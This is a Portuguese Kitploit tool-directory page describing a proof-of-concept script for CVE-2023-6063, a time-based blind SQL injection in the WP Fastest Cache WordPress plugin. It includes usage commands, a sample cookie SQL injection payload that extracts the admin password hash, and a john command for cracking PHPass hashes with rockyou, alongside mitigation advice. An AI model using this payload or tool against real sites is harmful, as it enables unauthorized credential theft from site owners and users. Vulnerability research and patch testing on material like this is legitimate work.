Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-6063-PoC — Um Proof of Concept para CVE-2023-6063, uma vulnerabilidade de injeção SQL cega baseada em tempo no WP Fastest Cache ≤1.2.2. | Kitploit
Ferramentas/GitHubGitHub/incommatose/cve-2023-6063-poc
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

Um Proof of Concept para CVE-2023-6063, uma vulnerabilidade de injeção SQL cega baseada em tempo no WP Fastest Cache ≤1.2.2.

Ver Repositório
2139há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC para CVE-2023-6063: WP Fastest Cache 1.2.2 Injeção SQL Cega Não Autenticada

Static Badge Static Badge Static Badge

Uma Prova de Conceito para CVE-2023-6063, uma vulnerabilidade de injeção SQL cega baseada em tempo no WP Fastest Cache ≤1.2.2. Extrai senhas com hash (user_pass) e e-mails (user_email) da tabela wp_users abusando do cookie wordpress_logged_in.

Funcionalidades

  • Exfiltração de dados baseada em tempo (caractere por caractere) via atrasos SLEEP().
  • Suporta cookies personalizados, nomes de usuário alvo e validação de hash.

Este script extrai:

  • ☑️ Hashes de senhas do WordPress (MD5/PHPass).
  • ☑️ Endereços de e-mail associados.
  • Argumentos de linha de comando para testes flexíveis (--just-hash, --just-email, --debug).

Uso

Instale as dependências (se não estiverem instaladas):

root@kitploit:~
pip install -r requirements.txt

Uso básico:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

Opções completas:

root@kitploit:~
  -h, --help            mostra esta mensagem de ajuda e sai
  -u URL, --url URL     URL completa para o WordPress para testar CVE-2023-6063
  --username USERNAME   Define um usuário para extrair sua senha com hash
  -d DELAY, --delay DELAY
                        Tempo para aguardar resposta da web, padrão 5, mínimo 2
  -H HASH, --hash HASH  Hash para verificar na tabela wp_users, se o hash contiver caracteres especiais, use aspas simples -> '<hash>'
  --domain DOMAIN       Nome do domínio para validação de e-mail
  -c COOKIE, --cookie COOKIE
                        Especifique um nome de cookie se for diferente no seu contexto
  --status-code STATUS_CODE
                        Use um código de status positivo específico, padrão 200
  --debug               Mais detalhamento
  --just-hash           Apenas extrair senha com hash
  --just-email          Apenas extrair valor de e-mail para um usuário

💻 Demonstração

Esta é uma demonstração para o usuário admin

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Quando hashes de senhas são vazados, use john ou hashcat para descriptografá-los com o algoritmo PHPass se a senha for vulnerável.

Exemplo com John:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ Detalhes Técnicos

📖 Descrição da Vulnerabilidade

O plugin WP Fastest Cache (≤1.2.2) para WordPress é vulnerável a uma injeção SQL cega não autenticada através do cookie wordpress_logged_in. Atacantes podem explorar esta falha para extrair dados sensíveis (por exemplo, hashes de senhas, endereços de e-mail) da tabela wp_users usando atrasos baseados em tempo (SLEEP()) em consultas SQL.

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 Aviso: Use esta informação apenas para testes de segurança éticos com autorização adequada. A exploração não autorizada é ilegal.

  • ID CVE: CVE-2023-6063
  • Pontuação da Vulnerabilidade: 7.5 (Alta)
  • Tipo de Vulnerabilidade: Injeção SQL (Cega, Baseada em Tempo)
  • Software Afetado: WP Fastest Cache (Plugin WordPress) ≤ v1.2.2

🔍 Vetor de Ataque

  • Explorabilidade: Remota (Nenhuma autenticação necessária)
  • Complexidade do Ataque: Baixa (Explorável através de requisições HTTP manipuladas)

🔥 Impacto:

  • Confidencialidade: Alta (Vaza credenciais de administrador)
  • Integridade: Nenhuma
  • Disponibilidade: Nenhuma

📌 Versões Afetadas

  • Versões do WP Fastest Cache ≤1.2.2

🛡️ Mitigação

Atualize o WP Fastest Cache para a versão >1.2.2.

  • Atualize para WP Fastest Cache v1.2.3 ou posterior.
  • Aplique regras de WAF para bloquear payloads de SQLi em cookies.
  • Desative o plugin se não estiver em uso.

📚 Referências

  • Entrada NIST NVD
  • Aviso do Plugin WordPress
  • Detalhes do CVE

⚖️ Legal

  • Este script é para fins educacionais. Sempre obtenha permissão explícita antes de testar.
Baixar ferramenta